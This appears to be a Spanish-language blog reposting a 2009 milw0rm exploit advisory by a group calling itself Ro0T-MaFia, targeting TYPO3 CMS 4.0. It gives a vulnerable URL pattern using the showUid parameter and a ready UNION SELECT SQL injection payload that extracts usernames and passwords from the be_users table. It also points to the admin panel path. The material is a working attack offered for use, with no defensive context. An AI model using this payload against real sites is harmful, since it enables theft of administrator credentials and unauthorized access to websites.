~xassiz_'s blog: TYPO3 CMS 4.0 (showUid) Remote SQL Injection Vulnerability

#-----
TYPO3 CMS 4.0  SQL-Injection Vulnerability
#-----


#####################################################
# [+] Author        :  CyberNaj, JxE-13             #  
# [+] Vulnerability :  SQL injection                #
# [+] Group         :  Ro0T-MaFia                   #
#####################################################

#-----

Info CMS:

* Name      : TYPO3
* Web       : http://typo3.org
* dowloand  : http://typo3.org/download/packages/   
* Country   : Venezuela
         
#-----

Vulnerability:

http://www.host.com/index.php?id=[xxx][showUid]=[SQL-injection]&cHash=[xxx]

SQL-injection: -1+union+select+username,2,password,4,5,6,7+from+be_users--

Admin Panel: /typo3/index.php

#-----


# milw0rm.com [2009-08-06]

Saludos,
xassiz ;)

~xassiz_'s blog

TYPO3 CMS 4.0 (showUid) Remote SQL Injection Vulnerability

0 comentarios:

Publicar un comentario

Bienvenido

Reloj

Visitas

Temas

Archivo